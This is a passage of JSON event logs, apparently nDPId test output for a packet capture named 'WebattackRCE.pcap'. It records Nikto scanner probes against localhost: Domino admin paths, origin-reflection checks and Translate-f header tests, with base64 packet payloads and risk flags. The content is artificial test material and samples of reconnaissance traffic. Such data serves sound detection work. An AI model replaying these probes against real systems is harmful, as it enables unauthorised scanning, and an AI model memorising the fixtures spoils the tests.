01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276743,"flow_last_seen":1576420276743,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276743,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49652,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276744,"flow_last_seen":1576420276744,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276744,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49654,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1576420276744,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420276744,"pkt":"AAAAAAAAAAAAAAAACABFAADJ7atAAEAGToF\/AAABfwAAAcH2H5DjmNWMPF0CB4AYAED+vQAAAQEICp1m+zCdZvswR0VUIC9hZG1pbjQubnNmIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpEb21pbm8gZGV0ZWN0aW9uKQ0KDQo="}
01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276744,"flow_last_seen":1576420276744,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276744,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49654,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin4.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276745,"flow_last_seen":1576420276745,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276745,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49656,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1576420276745,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420276745,"pkt":"AAAAAAAAAAAAAAAACABFAADJnTFAAEAGnvt\/AAABfwAAAcH4H5DLFKUODsXYX4AYAED+vQAAAQEICp1m+zGdZvsxR0VUIC9hZG1pbjUubnNmIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpEb21pbm8gZGV0ZWN0aW9uKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276745,"flow_last_seen":1576420276745,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276745,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49656,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin5.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":58,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276747,"flow_last_seen":1576420276747,"flow_idle_time":7580000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":151,"midstream":1,"thread_ts_msec":1576420276747,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49658,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1576420276747,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":217,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":217,"pkt_l4_len":183,"thread_ts_msec":1576420276747,"pkt":"AAAAAAAAAAAAAAAACABFAADL46dAAEAGWIN\/AAABfwAAAcH6H5C6Q9uIEYxnOoAYAED+vwAAAQEICp1m+zOdZvsyR0VUIC93ZWJhZG1pbi5uc2YgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpEb21pbm8gZGV0ZWN0aW9uKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276747,"flow_last_seen":1576420276747,"flow_idle_time":7580000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":151,"midstream":1,"thread_ts_msec":1576420276747,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49658,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/webadmin.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276749,"flow_last_seen":1576420276749,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420276749,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49660,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00684{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1576420276749,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":220,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":220,"pkt_l4_len":186,"thread_ts_msec":1576420276749,"pkt":"AAAAAAAAAAAAAAAACABFAADONl9AAEAGBcl\/AAABfwAAAcH8H5Dz0w5\/kxB3k4AYAED+wgAAAQEICp1m+zWdZvs1R0VUIC9ub25leGlzdGVudC5uc2YgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpEb21pbm8gZGV0ZWN0aW9uKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276749,"flow_last_seen":1576420276749,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420276749,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49660,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/nonexistent.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":60,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276751,"flow_last_seen":1576420276751,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276751,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49662,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1576420276751,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420276751,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/ubFAAEAGgoV\/AAABfwAAAcH+H5C5FIGNENlwioAYAED+swAAAQEICp1m+zedZvs2R0VUIC8gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpwYXJrZWQgZGV0ZWN0aW9uKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276751,"flow_last_seen":1576420276751,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276751,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49662,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:parked detection)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276754,"flow_last_seen":1576420276754,"flow_idle_time":7580000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420276754,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49664,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00700{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1576420276754,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1576420276754,"pkt":"AAAAAAAAAAAAAAAACABFAADbnMVAAEAGn1V\/AAABfwAAAcIAH5C\/caTogsAMB4AYAED+zwAAAQEICp1m+zqdZvs5R0VUIC8gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpvcmlnaW5fcmVmbGVjdGlvbikNCk9yaWdpbjogbmlrdG8uZXhhbXBsZS5jb20NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276754,"flow_last_seen":1576420276754,"flow_idle_time":7580000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420276754,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49664,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:origin_reflection)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":62,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276756,"flow_last_seen":1576420276756,"flow_idle_time":7580000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":162,"midstream":1,"thread_ts_msec":1576420276756,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49666,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00691{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1576420276756,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":1576420276756,"pkt":"AAAAAAAAAAAAAAAACABFAADW2EVAAEAGY9p\/AAABfwAAAcICH5Ck9+BnopzEpIAYAED+ygAAAQEICp1m+zydZvs8R0VUIC8gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpvcmlnaW5fcmVmbGVjdGlvbikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KT3JpZ2luOiAuZXhhbXBsZS5jb20NCg0K"}
01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276756,"flow_last_seen":1576420276756,"flow_idle_time":7580000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":162,"midstream":1,"thread_ts_msec":1576420276756,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49666,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:origin_reflection)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276758,"flow_last_seen":1576420276758,"flow_idle_time":7580000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420276758,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49668,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1576420276758,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":1576420276758,"pkt":"AAAAAAAAAAAAAAAACABFAADPoehAAEAGmj5\/AAABfwAAAcIEH5AAZJnEB3vRtYAYAED+wwAAAQEICp1m+z6dZvs+R0VUIC9pbmRleC5hc3AgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBUcmFuc2xhdGUtZiAjMSkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01067{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276758,"flow_last_seen":1576420276758,"flow_idle_time":7580000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420276758,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49668,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":64,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276760,"flow_last_seen":1576420276760,"flow_idle_time":7580000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"midstream":1,"thread_ts_msec":1576420276760,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49670,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1576420276760,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":223,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":223,"pkt_l4_len":189,"thread_ts_msec":1576420276760,"pkt":"AAAAAAAAAAAAAAAACABFAADRGS1AAEAGIvh\/AAABfwAAAcIGH5CUqCEOlTzFf4AYAED+xQAAAQEICp1m+0CdZvtAR0VUIC9qdW5rOTk5LmFzcCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmhlYWRlcnM6IFRyYW5zbGF0ZS1mICMxKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276760,"flow_last_seen":1576420276760,"flow_idle_time":7580000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"midstream":1,"thread_ts_msec":1576420276760,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49670,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/junk999.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276761,"flow_last_seen":1576420276761,"flow_idle_time":7580000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420276761,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49672,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1576420276761,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"thread_ts_msec":1576420276761,"pkt":"AAAAAAAAAAAAAAAACABFAADQx0dAAEAGdN5\/AAABfwAAAcIIH5Btvf9kj27E6oAYAED+xAAAAQEICp1m+0GdZvtBR0VUIC9pbmRleC5hc3B4IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6aGVhZGVyczogVHJhbnNsYXRlLWYgIzEpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01068{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":65,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276761,"flow_last_seen":1576420276761,"flow_idle_time":7580000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420276761,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49672,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.aspx","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":66,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276763,"flow_last_seen":1576420276763,"flow_idle_time":7580000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"midstream":1,"thread_ts_msec":1576420276763,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49674,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
